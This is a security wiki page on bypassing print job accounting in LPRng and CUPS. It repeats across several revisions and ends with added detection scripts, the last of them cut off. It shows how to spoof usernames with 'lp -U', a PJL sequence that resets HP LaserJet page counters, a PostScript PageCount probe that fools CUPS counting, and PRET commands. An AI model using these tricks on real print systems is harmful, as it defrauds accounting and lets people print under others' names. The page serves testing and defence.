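A raw queue by definition skips the CUPS filter chain, so a check like this has to run where the raw job is still visible (a wrapper around the submission path or a periodic scan of spooled jobs); the point of the example is that the discrepancy between the two counts is detectable at the server even though the software page counter itself reports only one page.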
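Added example for the authentication bypass section at the top of this page (not code from this wiki or from CUPS): since the accounted username is whatever the client sends, a print-server operator can at least look for workstations that print under many different names in the CUPS <code>page_log</code>. It assumes the CUPS 2.x default <code>PageLogFormat</code> (<code>%p %u %j %T %P %C %{job-billing} %{job-originating-host-name} %{job-name} %{media} %{sides}</code>), one line per printed page, and a threshold of one user per single-user workstation; the log lines, host addresses and names are constructed.

```python
"""Spot client-supplied usernames that do not fit their originating host.

Added example for the authentication bypass section; not code from the
Hacking Printers wiki or from CUPS. Assumes the CUPS 2.x default
PageLogFormat with one page_log line per printed page; all sample data
below is constructed.
"""
import re
from collections import defaultdict

_LINE_RE = re.compile(
    r"^(?P<printer>\S+) (?P<user>\S+) (?P<job>\d+) \[(?P<time>[^\]]+)\] "
    r"(?P<page>\d+) (?P<copies>\d+) (?P<billing>\S+) (?P<host>\S+) "
    r"(?P<name>.*) (?P<media>\S+) (?P<sides>\S+)$"
)


def parse_page_log(text: str) -> list[dict]:
    """Parse page_log lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def users_per_host(entries: list[dict]) -> dict:
    """Map originating host -> {username: pages accounted under that name}.

    Each page_log line is one page, multiplied by the copies field.
    """
    table: dict = defaultdict(lambda: defaultdict(int))
    for e in entries:
        table[e["host"]][e["user"]] += int(e["copies"])
    return table


def suspicious_hosts(entries: list[dict], max_users: int = 1) -> dict:
    """Hosts that printed under more distinct usernames than expected.

    max_users=1 is this example's assumption for single-user workstations;
    shared terminals need a higher threshold or a per-host allow list.
    """
    return {
        host: dict(users)
        for host, users in users_per_host(entries).items()
        if len(users) > max_users
    }


# Constructed page_log excerpt: 10.0.0.5 submits jobs as alice, then as
# nobody (cf. `lp -U nobody test.ps` above) and as carol.
PAGE_LOG = """\
lj4250 alice 101 [25/Jun/2017:11:31:30 +0200] 1 1 - 10.0.0.5 thesis.ps A4 one-sided
lj4250 alice 101 [25/Jun/2017:11:31:31 +0200] 2 1 - 10.0.0.5 thesis.ps A4 one-sided
lj4250 bob 102 [25/Jun/2017:11:40:02 +0200] 1 1 - 10.0.0.7 memo.pdf A4 one-sided
lj4250 nobody 103 [25/Jun/2017:11:45:10 +0200] 1 3 - 10.0.0.5 test.ps A4 one-sided
lj4250 carol 104 [25/Jun/2017:11:50:44 +0200] 1 1 - 10.0.0.5 poster.ps A3 one-sided
"""

if __name__ == "__main__":
    for host, users in suspicious_hosts(parse_page_log(PAGE_LOG)).items():
        print(host, "printed as", users)
```

This is a detection, not a fix: it only narrows down which hosts to look at and which accounted pages are in doubt. The page's own conclusion stands, that the server has to authenticate the job (Kerberos, or HTTP basic/digest in CUPS) rather than trust the <code>-U</code> value, and that direct access to the printer must be blocked so the server cannot be bypassed altogether.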
The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. 
Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: lp -U nobody test.ps '''Who can perform this attack?''' Any anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. 
This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecounter 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 
=== Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Any anyone who forward jobs to the (CUPS based) print server. (However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies.) <!-- % number of copies vs. 
density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- 3ee567120cd887ce7b692ad6da0c7de6f8c8e7ef 120 51 2017-01-14T19:53:31Z Admin 1 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. 
'''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. 
The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. '''How to test for this attack?''' If your system is already configured to use the print server to be tested, you can verify proper authentication trying to print with a custom username like this: lp -U nobody test.ps '''Who can perform this attack?''' Any anyone who can access the print server (as said, if the printer can be accessed directly you have already lost anyway). == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. 
At the end of the document to be printed and separated by the [[UEL]], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. '''How to test for this attack?''' On older HP laserjets the ''pagecounter'' command of [[PRET]] can be used to easily set hardware pagecounters: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> pagecounter 10 Old pagecounter: 53214 New pagecounter: 10 '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. === Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. 
For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists – which will return ''false'' when interpreted in CUPS/Ghostscript – before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. '''How to test for this attack?''' Wrap an arbitrary multi-page PostScript document in the code above and print. Then go to <code>http://printserver:631/jobs?which_jobs=all</code> and check CUPS's page counter for this print job. Note that have to establish a raw raw queue. This is, a queue where the filtering system is not involved and the print job goes directly to a printer. For CUPS, this is done done by setting the content type to <code>application/vnd.cups-raw</code>. If your system is already configured to use the print server to be tested, simply use: <code>lp -o raw test.ps</code>. '''Who can perform this attack?''' Any anyone who forward jobs to the (CUPS based) print server. (However it deserves to be mentioned that only a local attacker has an actual benefit of free hard copies.) <!-- % number of copies vs. 
density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> ---- 8df3f6429cc5eaad3b53b895928a6edd57ab6677 51 49 2017-01-05T15:32:48Z 134.147.128.156 0 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. == Introduction to print job accounting == There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. 
'''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]]. There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following both options are discussed for LPRng (v3.8.B) and CUPS (v2.1.4) installations which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below. {| class="wikitable" style="text-align:center" |+ Security features of LPRng and CUPS |- ! Printing system !! Protocol !! Encryption !! Authentication !! Page counter |- | LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware |- | CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software |} == Authentication bypasses == LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly and in case the attacker cannot access the printer directly she will be not be able to impersonate other users. Those security features however are optional and rarely applied in the real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – which can be set to arbitrary values by the client side. 
The reasons for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something while the costs of a few unaccounted printouts are bearable. == Page counter manipulation == === Hardware page counters === For correct accounting the number of printed pages must be determined by the printing system which is not a trivial task as discussed in <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>''[http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html Printer Accounting Reality Check]'', LPRng-HOWTO, P. Powell, 1995</ref>. Such hardware page counters are supported by most printers and '''read''' by LPRng using PJL after every print job. HP has even documented a feature to '''write''' to the page counter variable <ref>''[https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf HP LaserJet Family Quick Reference Service Guide]'', HP Inc., 1999, p. 53</ref> by setting the printer into service mode. This way, the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and the ''HP LaserJet 4250N'' can be manipulated within a print job. 
At the end of the document to be printed and separated by the [UEL], the counter simply has to be reset to its original value (for example, <code>2342</code>): \x1b%-12345X@PJL JOB This page was printed for free \x1b%-12345X@PJL EOJ \x1b%-12345X@PJL JOB @PJL SET SERVICEMODE=HPBOISEID @PJL SET PAGES=2342 \x1b%-12345X@PJL EOJ Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices, however this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: It is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter. === Software page counters === CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists (which will return ''false'' when interpreted in CUPS/Ghostscript) before actually printing the document as shown below. <syntaxhighlight lang=postscript> currentsystemparams (PageCount) known { <@\textit{[...] code which is only executed on a printer device [...]}@> } if </syntaxhighlight> This way, the accounting software used by CUPS renders a different document than the printer. CUPS only accounts for one page – which seems to be a hardcoded minimum – while the real print job can contain hundreds of pages. 
Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter (Ghostscript's ps2write) before it reaches the page counter. <!-- Manipulating hardware page counters with PJL or tricking software page counters with PostScript can be performed in all defined attacker models, however it deserves to be mentioned that only a local attacker (AM1) has an actual benefit of free hard copies. % number of copies vs. density % http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532 % http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups % http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works % http://www.cups.org/doc/accounting.html % http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html % http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html % http://lists.pykota.com/pipermail/pykota/2006-October/004177.html --> also: can we overwrite the pagecounter operator? 01ea18bcfb43dd93073b63e16905874f04c6cceb 49 48 2017-01-05T14:57:51Z 134.147.128.156 0 wikitext text/x-wiki Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first. 
== Introduction to print job accounting ==

There are two major approaches when it comes to print job accounting: either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not discussed further here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server, which can often be abused to print as described in [[Network protocols]].

There are basically two approaches to circumvent or trick print job accounting systems: either impersonate another user or manipulate the counter of printed pages. In the following we discuss both options for LPRng (v3.8.B) and CUPS (v2.1.4) installations, which are popular open-source printing systems used in academic and corporate environments. A comparison of the security features of both systems is given below.

{| class="wikitable" style="text-align:center"
|+ Security features of LPRng and CUPS
|-
! Printing system !! Protocol !! Encryption !! Authentication !! Page counter
|-
| LPRng || [[LPD]] || SSL/TLS || Kerberos, PGP || hardware
|-
| CUPS || [[IPP]] || SSL/TLS || Kerberos, HTTP || software
|}

== Authentication bypasses ==

LPRng and CUPS both offer SSL based channel encryption and secure authentication schemes like [https://en.wikipedia.org/wiki/Kerberos_(protocol) Kerberos], [https://en.wikipedia.org/wiki/Pretty_Good_Privacy PGP] signed print jobs or HTTP [https://en.wikipedia.org/wiki/Basic_access_authentication basic]/[https://en.wikipedia.org/wiki/Digest_access_authentication digest] authentication. If configured properly, and in case the attacker cannot access the printer directly, she will not be able to impersonate other users. Those security features however are optional and rarely applied in real-world print servers. Instead, the usernames given as LPD (LPRng) or IPP (CUPS) parameters are logged and accounted for – and these can be set to arbitrary values by the client side. The reason for this is a simple cost-benefit consideration in most institutions: Kerberos needs a special setup on every client and HTTP authentication requires users to enter a password whenever they want to print something, while the costs of a few unaccounted printouts are bearable.

== Page counter manipulation ==

=== Hardware page counters ===

For correct accounting the number of printed pages must be determined by the printing system, which is not a trivial task as discussed in <ref>Deußen, J., ''Counting Pages in Printer Data Streams'', (2011), http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf.</ref>. The authors of LPRng ‘make the assumption that the printer has some sort of non-volatile page counter mechanism that is reliable and impervious to power on/off cycles’ <ref>Powell, P., ''Printer Accounting Reality Check'', (1995), http://web.mit.edu/ops/services/print/Attic/src/doc/LPRng-HOWTO-15.html.</ref>. Such hardware page counters are supported by most printers and are read by LPRng using PJL after every print job. HP has even documented a feature to write to the page counter variable <ref>HP Inc., ''HP LaserJet Family Quick Reference Service Guide'', (1999), https://h30434.www3.hp.com/psg/attachments/psg/PostPrint/141685/1/PJL%20commands-Druckerz%C3%A4hler%20setzen%20HP2015dn.pdf.</ref>. By setting the printer into service mode as previously explained we were able to manipulate the page counter of the ''HP LaserJet 1200'', ''HP LaserJet 4200N'' and ''HP LaserJet 4250N''. At the end of the document to be printed, and separated by the UEL (Universal Exit Language) sequence, the counter simply has to be reset to its original value (<code>2342</code>).

Resetting the page counter on HP LaserJets:

<syntaxhighlight lang=pjl>
\x1b%-12345X@PJL JOB
This page was printed for free
\x1b%-12345X@PJL EOJ
\x1b%-12345X@PJL JOB
@PJL SET SERVICEMODE=HPBOISEID
@PJL SET PAGES=2342
\x1b%-12345X@PJL EOJ
</syntaxhighlight>

Based on the logic of the accounting software an attacker might even increase the balance of her account – which may be linked with other services like the canteen – by setting a negative number of printed pages. Note that resetting the device to [[Factory defaults]] also resets the page counter to zero on some of the tested devices; however, this method is not suited if a certain value is desired. Lowering the page counter can also be used to sell a printer above its price, as it can be compared to the odometer when buying a second-hand car. It is however worth emphasizing that resetting the page counter is not necessarily for malicious purposes: it is a well-known business model to sell overpriced ink for low-cost inkjet devices and block third-party refill kits by refusing to print after a certain number of pages – to handle such unethical practices it is absolutely legitimate to reset the page counter.

=== Software page counters ===

Below we briefly discuss how LPRng and CUPS try to solve the problem of accounting. CUPS uses software page counters which have been implemented for all major page description languages. For PostScript, an easy way to bypass accounting is to check if the ''PageCount'' system parameter exists before actually printing the document, as shown below.

<syntaxhighlight lang=postscript>
currentsystemparams (PageCount) known {
  % [...] code which is only executed on a printer device [...]
} if
</syntaxhighlight>

This way, the accounting software used by CUPS renders a different document than the printer. In our tests, CUPS only accounted for one page – which seems to be a hardcoded minimum – while the real job can be hundreds of pages. Note that using the IPP ‘raw’ queue/option is mandatory, otherwise CUPS parses the code with a PostScript-to-PostScript filter before it reaches the page counter.

<!--
Manipulating hardware page counters with PJL or tricking software page counters with PostScript can be performed in all defined attacker models, however it deserves to be mentioned that only a local attacker (AM1) has an actual benefit of free hard copies.
% number of copies vs. density
% http://unix.stackexchange.com/questions/101395/cups-and-printer-security/194532
% http://www.pykota.com/ | http://www.pykota.com/software/pkpgcounter for cups
% http://stackoverflow.com/questions/15628319/how-cups-printer-accounting-works
% http://www.cups.org/doc/accounting.html
% http://www.lprng.com/LPRng-HOWTO-Multipart/accountingref.html
% http://www.brunel.ac.uk/~tony/LPRng/LPRng-HOWTO-11.html
% http://lists.pykota.com/pipermail/pykota/2006-October/004177.html
-->
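A print-server side check covering both counter tricks described above (PJL <code>SET PAGES</code> against hardware counters and the PostScript ''PageCount'' probe against CUPS software counters), as an added example that is not part of this wiki nor of CUPS or LPRng; the sample job, the regular expressions and the before/after counter reconciliation are my own assumptions about what an operator of a raw queue could run before forwarding a job:

```python
"""Print-server side check for page-counter tampering in a submitted job.

Added example, not code from the Hacking Printers wiki or from CUPS/LPRng.
It splits a job at the PJL Universal Exit Language (UEL) sequence, flags the
PJL commands that rewrite the hardware counter (SET SERVICEMODE / SET PAGES),
flags PostScript that probes the PageCount system parameter so it behaves
differently on the device than in the software page counter, and reconciles a
before/after hardware counter reading (what LPRng obtains via PJL INFO
PAGECOUNT) with the page count the software counter charged for the job.
"""
import re

UEL = b"\x1b%-12345X"  # <ESC>%-12345X, separates PJL/PCL/PostScript segments

# PJL commands that change the device's accounting state (the two variables
# used in the wiki's HP LaserJet example); case-insensitive, whitespace tolerant.
PJL_COUNTER_SET = re.compile(rb"@PJL\s+SET\s+(SERVICEMODE|PAGES)\s*=\s*(\S+)", re.I)

# PostScript that tests for the PageCount system parameter, i.e. code that can
# tell a printer's interpreter apart from the accounting filter's interpreter.
PS_PAGECOUNT_PROBE = re.compile(rb"currentsystemparams[^\n]*\(PageCount\)\s*known")


def split_uel(stream: bytes) -> list:
    """Return the non-empty segments of a job stream separated by UEL."""
    return [seg for seg in stream.split(UEL) if seg.strip()]


def inspect_job(stream: bytes) -> dict:
    """Scan one raw job and report counter-manipulation indicators."""
    report = {"segments": 0, "pjl_set": [], "ps_pagecount_probe": False}
    for seg in split_uel(stream):
        report["segments"] += 1
        for m in PJL_COUNTER_SET.finditer(seg):
            report["pjl_set"].append((m.group(1).upper().decode(), m.group(2).decode()))
        if PS_PAGECOUNT_PROBE.search(seg):
            report["ps_pagecount_probe"] = True
    report["suspicious"] = bool(report["pjl_set"]) or report["ps_pagecount_probe"]
    return report


def check_counter_delta(before: int, after: int, accounted_pages: int) -> str:
    """Reconcile the hardware counter read before and after a job with the
    number of pages the software counter charged for that job."""
    if after < before:
        return "counter_decreased"   # only SET PAGES or a factory reset does this
    printed = after - before
    if printed == 0 and accounted_pages > 0:
        return "counter_unchanged"   # e.g. counter reset to its original value
    if printed > accounted_pages:
        return "undercounted"        # device printed more than was charged
    if printed < accounted_pages:
        return "overcounted"
    return "ok"


# Constructed sample job modelled on the wiki's examples: a PostScript page
# that renders extra content only on a real printer, followed by a second PJL
# job that rewrites the page counter to 2342.
SAMPLE_JOB = (
    UEL + b"@PJL JOB\r\n"
    + b"%!PS\n"
    + b"/Helvetica findfont 12 scalefont setfont\n"
    + b"currentsystemparams (PageCount) known {\n"
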